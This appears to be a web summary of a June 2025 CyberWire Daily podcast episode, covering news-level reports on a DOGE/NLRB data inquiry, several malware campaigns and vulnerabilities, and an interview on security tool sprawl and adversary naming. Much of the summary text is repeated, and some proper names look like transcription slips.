Can’t DOGE the inquiry. - CyberWire Daily

Summary

CyberWire Daily – Episode: "Can’t DOGE the Inquiry" Release Date: June 17, 2025
Host: Dave Bittner, N2K Networks

Overview

In this episode of CyberWire Daily, host Dave Bittner delves into a range of pressing cybersecurity issues, from high-profile congressional inquiries and sophisticated malware campaigns to significant vulnerabilities in major software platforms. The episode also features an in-depth interview with Brian Downey, VP of Product Management at Barracuda, discussing the challenges of security sprawl and effective adversary naming conventions.

Key News Stories

1. House Oversight Committee Requests Documents from Microsoft

Timestamp: [02:02]

Representative Stephen F. Lynch, Democrat from Massachusetts and acting ranking member of the Committee on Oversight and Government Reform, has formally requested documents from Microsoft CEO Satya Nadella. This inquiry centers around allegations that employees from Elon Musk's Department of Government Efficiency, known as "Doge," attempted to exfiltrate sensitive data from the National Labor Relations Board (NLRB).

Key Points:

Alleged Actions: Doge staff purportedly used high-level access to remove data, including information on union activities, and obscured their actions by deleting logs and installing backdoors.
Whistleblower Reports: NPR and internal whistleblowers have brought these activities to light.
Code Upload: A Doge engineer allegedly uploaded code named "NX Genbedoor Extract" to GitHub, a Microsoft-owned platform.
Congressional Investigations: Initiated by Democrats in April and May 2025, focusing on Musk and Doge's potential interference and data breaches at the NLRB.

Notable Quote:

"Lynch raised concerns over potential misconduct, privacy violations and conflicts of interest given Musk's history with the NLRB." [02:02]

2. Predatory Sparrow Claims Cyberattack on Iranian Bank

Timestamp: [02:02]

A cyber group named Predatory Sparrow, believed to be affiliated with Israeli intelligence, has claimed responsibility for a cyberattack targeting an Iranian bank. The attack disrupted banking services, affecting gas stations, delaying salaries, and forcing some branches to close.

Key Points:

Motivation: Retaliation against the bank's alleged funding of Iran's military and nuclear programs.
Historical Context: Predatory Sparrow has previously targeted Iran's steel and fuel sectors.
Regional Tensions: The attack mirrors ongoing tensions, including Israeli strikes on Iranian facilities and retaliations by pro-Iranian hacktivists.
Future Threats: Hacktivists have cautioned that regional allies of Iran may also become targets.

Notable Quote:

"The attack disrupted banking services and reportedly affected gas stations, delayed salaries and closed some branches." [02:02]

3. Microsoft Commits European Data Residency

Timestamp: [02:02]

Microsoft has announced that data from its European cloud customers will remain within Europe, adhering to EU laws and managed by local staff. This strategy addresses increasing concerns over foreign access to sensitive data.

Key Points:

Data Sovereignty: Ensures compliance with European regulations by keeping data localized.
Operational Transparency: Remote access by Microsoft engineers will be approved and overseen by European personnel.
Expansion Plans: Microsoft is enhancing its cloud and AI operations in Europe, with plans to launch a sovereign private cloud by year-end.

Notable Quote:

"Microsoft confirmed that any remote access by its engineers will be approved and monitored by European personnel." [02:02]

4. Complex Malware Campaign Uncovered by Census Researchers

Timestamp: [02:02]

A sophisticated malware campaign utilizing heavily obfuscated Visual Basic script files has been identified, deploying a variety of Remote Access Trojans (RATs) such as Remcos, Asyncrat, DC Rat, and Limeret.

Key Points:

Attack Stages: Begins with bloated VBS droppers decoding base64 payloads and launching PowerShell scripts to fetch additional malware from platforms like archive.org.
Evasion Techniques: Uses resilient infrastructure via DuckDNS.org and payloads concealed within JPEG images to avoid detection.
Defense Recommendations: Disabling macros, filtering emails, and monitoring PowerShell usage are advised to mitigate risks.

Notable Quote:

"The campaign's advanced obfuscation and use of legitimate hosting services make detection and response especially challenging." [02:02]

5. Sitecore CMS Suffers Critical Vulnerabilities

Timestamp: [02:02]

Watchtower has identified seven serious vulnerabilities in Sitecore, a widely used Content Management System (CMS) employed by major companies like HSBC, United Airlines, and L'Oréal. Three of these flaws allow unauthenticated remote code execution (RCE).

Key Points:

Vulnerability Details: Includes a hardcoded default password combined with two post-auth RCE bugs, forming a complete pre-auth RCE chain.
Exposure: Over 22,000 instances of Sitecore were found exposed, with the actual number likely higher.
Patch Status: Vulnerabilities were patched in May after November notification, but no CVEs have been assigned yet.
Recommendations: Immediate patching and credential rotation are strongly urged.

Notable Quote:

"Watchtower urges immediate patching and credential rotation warning of the high risk to enterprise environments." [02:02]

6. North Korea Targets Academic Institutions with Malware

Timestamp: [02:02]

A new malware campaign attributed to North Korean entity Kim Suki is focusing on academic institutions by distributing password-protected research documents embedded with malicious OLE objects.

Key Points:

Delivery Method: Phishing emails masquerade as review requests from professors, containing Hangul word processor files.
Malware Behavior: Upon activation, the malware installs multiple files, conducts system reconnaissance, and establishes remote access via AnyDesk.
Impact: Exploits trust within academic collaborations, increasing the risk to interconnected government and private networks.
Security Evolution: Marks a shift in social engineering tactics, combining technical precision with realistic academic lures.

Notable Quote:

"This campaign marks an evolution in social engineering, blending technical precision with realistic academic bait and urge institutions to remain vigilant." [02:02]

7. ASUS Patches High-Severity Vulnerability in Armory Crate Software

Timestamp: [02:02]

ASUS has addressed a critical vulnerability in its Armory Crate software, which could allow attackers to gain full system access through an authorization bypass exploit.

Key Points:

Vulnerability Details: Caused by a Time of Check to Time of Use (TOCTOU) issue, enabling attackers to create a hard link and bypass driver restrictions.
Affected Versions: Multiple software versions are impacted.
Discovery and Patch: Identified by Cisco Talos and patched in May; users are advised to update immediately.

Notable Quote:

"Attackers can exploit it by creating a hard link to bypass restrictions on a driver used by Armory Crate." [02:02]

8. CISA’s New Leader Faces Confirmation Delays

Timestamp: [02:02]

Sean Planky, President Trump's nominee to lead the Cybersecurity and Infrastructure Security Agency (CISA), remains in confirmation limbo due to procedural delays and an incomplete FBI clearance.

Key Points:

Nomination Stalemate: Despite bipartisan support, Senator Ron Wyden has placed a hold, demanding the release of a 2022 report on telecom vulnerabilities linked to the Salt Typhoon hack.
CISA’s Challenges: The delay impedes a major overhaul, including proposed budget cuts and staff reductions.
Leadership Vacuum: With former acting director Bridget Bean departed, concerns linger over CISA’s future under incoming Trump appointees.

Notable Quote:

"The delay hampers a major overhaul at CISA, including proposed budget cuts and staff reductions." [02:02]

Interview: Brian Downey on Security Sprawl and Risk

Timestamp: [12:53 – 23:42]

Guest: Brian Downey, VP of Product Management at Barracuda
Topic: How security sprawl increases risk and the necessity of rethinking adversary naming conventions.

Security Sprawl and Operational Inefficiencies

Brian Downey discusses the prevalent issue of security sprawl, where organizations manage an excessive number of security tools, leading to increased operational inefficiencies and heightened security risks.

Key Insights:

Prevalence: "65% of people that responded said our challenge has now pivoted... they're juggling too many security tools." [13:26]
Impact on Costs and Efficiency: "About 80% saying that this resulted in more time and cost they were spending." [13:26]
Security Risks: "77% said the number of tools was hindering their ability to detect and mitigate threats." [13:26]

Causes of Over-Provisioning

Downey attributes security sprawl to the expanding attack surface and the necessity for diverse tools to address varied security needs. However, the vendor landscape has not adequately supported the management of these multiple tools, leading to configuration issues and increased vulnerability to breaches.

Notable Quote:

"A third of issues that are discovered and breaches that occur occur from a poorly configured configuration or poorly configured tool." [15:30]

Role of AI in Mitigating Security Sprawl

Brian highlights the potential of AI to enhance the management of multiple security tools by automating the detection of misconfigurations and anomalies, thereby reducing the operational burden.

Key Points:

Enhanced Tool Capabilities: AI can make individual tools more powerful, potentially reducing the number needed.
Management Overhead Reduction: AI can help identify and rectify configuration issues, improving overall security posture.

Notable Quote:

"AI can help with the management overhead of those tools... how do we simplify the management?" [17:41]

Recommendations for Managing Security Tools

Downey emphasizes the importance of conducting a thorough inventory of security tools, assessing their value in reducing risk, and ensuring effective integration to create a cohesive security ecosystem.

Key Recommendations:

Inventory Assessment: Determine what tools are necessary based on the organization's risk profile.
Value Evaluation: Assess the additive value each tool provides to the security strategy.
Integration Focus: Prioritize tools that can seamlessly integrate operationally and in threat data correlation.

Notable Quote:

"You need to look at that lens and say... how do all of these fit into my strategy around reducing risk?" [18:43]

Op-Ed Discussion: Rethinking Adversary Naming Conventions

Timestamp: [23:42]

Dave Bittner highlights an op-ed by Jen Easterly and Kieran Martin, advocating for a shift from the traditional, often whimsical naming conventions for cyber adversaries (e.g., Fancy Bear) to more descriptive and neutral terms that accurately reflect the nature of these threats.

Key Points:

Current Practice: Adversaries are frequently named after Pokémon or other mascots, which can trivialize the seriousness of cyber threats.
Call for Change: The authors argue for a standardized, vendor-neutral naming system similar to those used in medicine and defense.
Benefits of Standardization: It would enhance clarity, reduce confusion among defenders, and appropriately categorize adversaries without sensationalizing them.

Notable Quote:

"It's time to stop branding our cyber adversaries like Pokémon and start naming them for what they are: nation states and criminals." [23:42]

Concluding Thoughts

This episode of CyberWire Daily provides a comprehensive overview of current cybersecurity challenges, from legislative inquiries and international cyber conflicts to the intricate issues of managing security infrastructure within organizations. The insightful discussion with Brian Downey underscores the critical need for streamlined security tool management and effective integration to mitigate risks associated with security sprawl. Additionally, the call for standardized adversary naming conventions aims to foster a more serious and unified approach to cybersecurity defense.

Produced by:

Senior Producer: Alice Carruth
Producer: Liz Stokes
Mixing: Trey Hester
Music and Sound Design: Elliot Peltzman
Executive Producer: Jennifer Ibin
Publisher: Peter Kilpe

Connect with CyberWire Daily:
For more detailed information on today's stories, visit thecyberwire.com or participate in the annual audience survey via the link in the show notes.

Summary

CyberWire Daily – Episode: "Can’t DOGE the Inquiry" Release Date: June 17, 2025
Host: Dave Bittner, N2K Networks

Overview

Key News Stories

1. House Oversight Committee Requests Documents from Microsoft

Timestamp: [02:02]

Key Points:

Alleged Actions: Doge staff purportedly used high-level access to remove data, including information on union activities, and obscured their actions by deleting logs and installing backdoors.
Whistleblower Reports: NPR and internal whistleblowers have brought these activities to light.
Code Upload: A Doge engineer allegedly uploaded code named "NX Genbedoor Extract" to GitHub, a Microsoft-owned platform.
Congressional Investigations: Initiated by Democrats in April and May 2025, focusing on Musk and Doge's potential interference and data breaches at the NLRB.

Notable Quote:

"Lynch raised concerns over potential misconduct, privacy violations and conflicts of interest given Musk's history with the NLRB." [02:02]

2. Predatory Sparrow Claims Cyberattack on Iranian Bank

Timestamp: [02:02]

Key Points:

Motivation: Retaliation against the bank's alleged funding of Iran's military and nuclear programs.
Historical Context: Predatory Sparrow has previously targeted Iran's steel and fuel sectors.
Regional Tensions: The attack mirrors ongoing tensions, including Israeli strikes on Iranian facilities and retaliations by pro-Iranian hacktivists.
Future Threats: Hacktivists have cautioned that regional allies of Iran may also become targets.

Notable Quote:

"The attack disrupted banking services and reportedly affected gas stations, delayed salaries and closed some branches." [02:02]

3. Microsoft Commits European Data Residency

Timestamp: [02:02]

Key Points:

Data Sovereignty: Ensures compliance with European regulations by keeping data localized.
Operational Transparency: Remote access by Microsoft engineers will be approved and overseen by European personnel.
Expansion Plans: Microsoft is enhancing its cloud and AI operations in Europe, with plans to launch a sovereign private cloud by year-end.

Notable Quote:

"Microsoft confirmed that any remote access by its engineers will be approved and monitored by European personnel." [02:02]

4. Complex Malware Campaign Uncovered by Census Researchers

Timestamp: [02:02]

Key Points:

Attack Stages: Begins with bloated VBS droppers decoding base64 payloads and launching PowerShell scripts to fetch additional malware from platforms like archive.org.
Evasion Techniques: Uses resilient infrastructure via DuckDNS.org and payloads concealed within JPEG images to avoid detection.
Defense Recommendations: Disabling macros, filtering emails, and monitoring PowerShell usage are advised to mitigate risks.

Notable Quote:

"The campaign's advanced obfuscation and use of legitimate hosting services make detection and response especially challenging." [02:02]

5. Sitecore CMS Suffers Critical Vulnerabilities

Timestamp: [02:02]

Key Points:

Vulnerability Details: Includes a hardcoded default password combined with two post-auth RCE bugs, forming a complete pre-auth RCE chain.
Exposure: Over 22,000 instances of Sitecore were found exposed, with the actual number likely higher.
Patch Status: Vulnerabilities were patched in May after November notification, but no CVEs have been assigned yet.
Recommendations: Immediate patching and credential rotation are strongly urged.

Notable Quote:

"Watchtower urges immediate patching and credential rotation warning of the high risk to enterprise environments." [02:02]

6. North Korea Targets Academic Institutions with Malware

Timestamp: [02:02]

A new malware campaign attributed to North Korean entity Kim Suki is focusing on academic institutions by distributing password-protected research documents embedded with malicious OLE objects.

Key Points:

Delivery Method: Phishing emails masquerade as review requests from professors, containing Hangul word processor files.
Malware Behavior: Upon activation, the malware installs multiple files, conducts system reconnaissance, and establishes remote access via AnyDesk.
Impact: Exploits trust within academic collaborations, increasing the risk to interconnected government and private networks.
Security Evolution: Marks a shift in social engineering tactics, combining technical precision with realistic academic lures.

Notable Quote:

"This campaign marks an evolution in social engineering, blending technical precision with realistic academic bait and urge institutions to remain vigilant." [02:02]

7. ASUS Patches High-Severity Vulnerability in Armory Crate Software

Timestamp: [02:02]

ASUS has addressed a critical vulnerability in its Armory Crate software, which could allow attackers to gain full system access through an authorization bypass exploit.

Key Points:

Vulnerability Details: Caused by a Time of Check to Time of Use (TOCTOU) issue, enabling attackers to create a hard link and bypass driver restrictions.
Affected Versions: Multiple software versions are impacted.
Discovery and Patch: Identified by Cisco Talos and patched in May; users are advised to update immediately.

Notable Quote:

"Attackers can exploit it by creating a hard link to bypass restrictions on a driver used by Armory Crate." [02:02]

8. CISA’s New Leader Faces Confirmation Delays

Timestamp: [02:02]

Sean Planky, President Trump's nominee to lead the Cybersecurity and Infrastructure Security Agency (CISA), remains in confirmation limbo due to procedural delays and an incomplete FBI clearance.

Key Points:

Nomination Stalemate: Despite bipartisan support, Senator Ron Wyden has placed a hold, demanding the release of a 2022 report on telecom vulnerabilities linked to the Salt Typhoon hack.
CISA’s Challenges: The delay impedes a major overhaul, including proposed budget cuts and staff reductions.
Leadership Vacuum: With former acting director Bridget Bean departed, concerns linger over CISA’s future under incoming Trump appointees.

Notable Quote:

"The delay hampers a major overhaul at CISA, including proposed budget cuts and staff reductions." [02:02]

Interview: Brian Downey on Security Sprawl and Risk

Timestamp: [12:53 – 23:42]

Guest: Brian Downey, VP of Product Management at Barracuda
Topic: How security sprawl increases risk and the necessity of rethinking adversary naming conventions.

Security Sprawl and Operational Inefficiencies

Key Insights:

Prevalence: "65% of people that responded said our challenge has now pivoted... they're juggling too many security tools." [13:26]
Impact on Costs and Efficiency: "About 80% saying that this resulted in more time and cost they were spending." [13:26]
Security Risks: "77% said the number of tools was hindering their ability to detect and mitigate threats." [13:26]

Causes of Over-Provisioning

Notable Quote:

"A third of issues that are discovered and breaches that occur occur from a poorly configured configuration or poorly configured tool." [15:30]

Role of AI in Mitigating Security Sprawl

Brian highlights the potential of AI to enhance the management of multiple security tools by automating the detection of misconfigurations and anomalies, thereby reducing the operational burden.

Key Points:

Enhanced Tool Capabilities: AI can make individual tools more powerful, potentially reducing the number needed.
Management Overhead Reduction: AI can help identify and rectify configuration issues, improving overall security posture.

Notable Quote:

"AI can help with the management overhead of those tools... how do we simplify the management?" [17:41]

Recommendations for Managing Security Tools

Key Recommendations:

Inventory Assessment: Determine what tools are necessary based on the organization's risk profile.
Value Evaluation: Assess the additive value each tool provides to the security strategy.
Integration Focus: Prioritize tools that can seamlessly integrate operationally and in threat data correlation.

Notable Quote:

"You need to look at that lens and say... how do all of these fit into my strategy around reducing risk?" [18:43]

Op-Ed Discussion: Rethinking Adversary Naming Conventions

Timestamp: [23:42]

Key Points:

Current Practice: Adversaries are frequently named after Pokémon or other mascots, which can trivialize the seriousness of cyber threats.
Call for Change: The authors argue for a standardized, vendor-neutral naming system similar to those used in medicine and defense.
Benefits of Standardization: It would enhance clarity, reduce confusion among defenders, and appropriately categorize adversaries without sensationalizing them.

Notable Quote:

"It's time to stop branding our cyber adversaries like Pokémon and start naming them for what they are: nation states and criminals." [23:42]

Concluding Thoughts

Produced by:

Senior Producer: Alice Carruth
Producer: Liz Stokes
Mixing: Trey Hester
Music and Sound Design: Elliot Peltzman
Executive Producer: Jennifer Ibin
Publisher: Peter Kilpe

Connect with CyberWire Daily:
For more detailed information on today's stories, visit thecyberwire.com or participate in the annual audience survey via the link in the show notes.